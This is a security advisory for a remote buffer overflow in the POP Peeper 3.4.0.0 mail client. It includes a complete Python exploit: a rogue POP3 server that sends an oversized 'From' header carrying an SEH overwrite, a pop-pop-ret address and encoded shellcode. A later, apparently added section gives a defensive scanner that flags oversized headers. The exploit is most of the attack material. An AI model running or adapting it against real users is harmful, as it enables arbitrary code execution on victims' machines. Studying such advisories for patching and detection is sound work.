Written by His0k4
Monday, 23 March 2009 22:21
POP Peeper 'From' Mail Header Remote Buffer Overflow Vulnerability
Bugtraq ID: 34192
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Mar 20 2009 12:00AM
Updated: Mar 23 2009 04:26PM
Credit: His0k4
Vulnerable: Mortal Universe Software Entertainment POP Peeper 3.4 0
Discussion
POP Peeper is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
POP Peeper 3.4.0.0 is vulnerable; other versions may also be affected.
Exploit(s)/PoC(s)
An attacker may exploit this issue by enticing a victim into connecting to a malicious server.
The following exploit is available:
34192.py

```python
#!/usr/bin/python
# [+] Bug       : POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)
# [+] Author    : His0k4
# [+] Greetings : All friends and muslims HacKerS (DZ)

from socket import *
import struct

# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x58"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x48"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x30\x4f\x35\x4a\x36\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")

# Filler used for the other header fields.
junk = "\x41"*1989

# Oversized 'From' value: padding up to the SEH record, then the handler chain.
payload  = "\x42"*352
payload += "\xEB\x10\x90\x90"   # jmp +10 (a 10-metre jump :p)
payload += "\x4C\x51\x01\x10"   # Universal pop pop ret (Imap.dll)
payload += "\x90"*19            # NOPs, buddy
payload += shellcode            # 100-dinar calculator :p

# Rogue POP3 server: wait for the client to connect.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 110))
s.listen(1)
print "[*] Listening on [POP3] 110"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])

# Answer the client's login and mailbox queries, then serve the message.
c.send("+OK\r\n")
c.recv(512)
c.send("+OK\r\n")
c.recv(512)
c.send("+OK\r\n")
c.recv(512)
c.send("+OK 1 100\r\n")
c.recv(512)
c.send("+OK\r\n1 root\r\n.\r\n")
c.recv(512)
c.send("+OK\r\n1 t00r\r\n.\r\n")
c.recv(512)
c.send("+OK 100 octets\r\n")
c.send("To: "+junk+"\r\n.\r\n")
c.send("From: "+payload+"\r\n.\r\n")
c.send("Subject: "+junk+"\r\n.\r\n")
c.send("Date: today\r\n.\r\n")
c.send("Content-Type: "+junk+"; charset=UTF-7\r\n.\r\n")

raw_input("[*] Payload sent!\nPress key to quit")
c.close()
s.close()
```
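A defender-side check for the condition this advisory describes, added here as an example and not part of the advisory or the PoC: it unwraps a POP3 RETR reply the way a mail proxy or IDS would see it and flags header fields (the 'From' line in particular) whose unfolded value exceeds the RFC 5322 line limit. The 998-byte limit comes from RFC 5322; the two sample replies are constructed.

```python
# Added example (not from the advisory): flag oversized mail headers in a POP3 RETR reply.
MAX_LINE = 998   # RFC 5322: a line MUST be no longer than 998 octets


def pop3_retr_body(response):
    """Strip the '+OK ...' status line and the terminating '.' from a RETR
    response, undo dot-stuffing and return the raw message text."""
    status, _, rest = response.partition("\r\n")
    if not status.startswith("+OK"):
        raise ValueError("server returned an error: %r" % status)
    lines = rest.split("\r\n")
    if lines and lines[-1] == "":      # trailing CRLF after the final '.'
        lines.pop()
    if lines and lines[-1] == ".":     # multi-line terminator
        lines.pop()
    return "\r\n".join(l[1:] if l.startswith("..") else l for l in lines)


def parse_headers(message):
    """Return {field_name_lower: unfolded_value} for the header block."""
    headers = {}
    current = None
    head = message.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n"):
        if line[:1] in (" ", "\t") and current is not None:
            headers[current] += " " + line.strip()   # folded continuation
        elif ":" in line:
            name, value = line.split(":", 1)
            current = name.strip().lower()
            headers[current] = value.strip()
    return headers


def oversized_headers(message, limit=MAX_LINE):
    """List (field, length) for header values longer than `limit` bytes."""
    return [(f, len(v)) for f, v in parse_headers(message).items() if len(v) > limit]


def scan(response):
    """Classify one RETR reply: [] means clean, otherwise the offending fields."""
    return oversized_headers(pop3_retr_body(response))


# Constructed samples: a normal message and one whose From value is far over the limit.
BENIGN = "+OK 60 octets\r\nFrom: alice@example.com\r\nSubject: hi\r\n\r\nhello\r\n.\r\n"
HOSTILE = "+OK 2100 octets\r\nFrom: " + "A" * 2000 + "\r\nSubject: hi\r\n\r\nbody\r\n.\r\n"

if __name__ == "__main__":
    print(scan(BENIGN))    # []
    print(scan(HOSTILE))   # [('from', 2000)]
```

A client that enforces this bound before copying header values into fixed-size buffers is not affected by the overflow described above.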
Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
Reference(s)
POP Peeper Homepage: http://www.poppeeper.com (POP Peeper)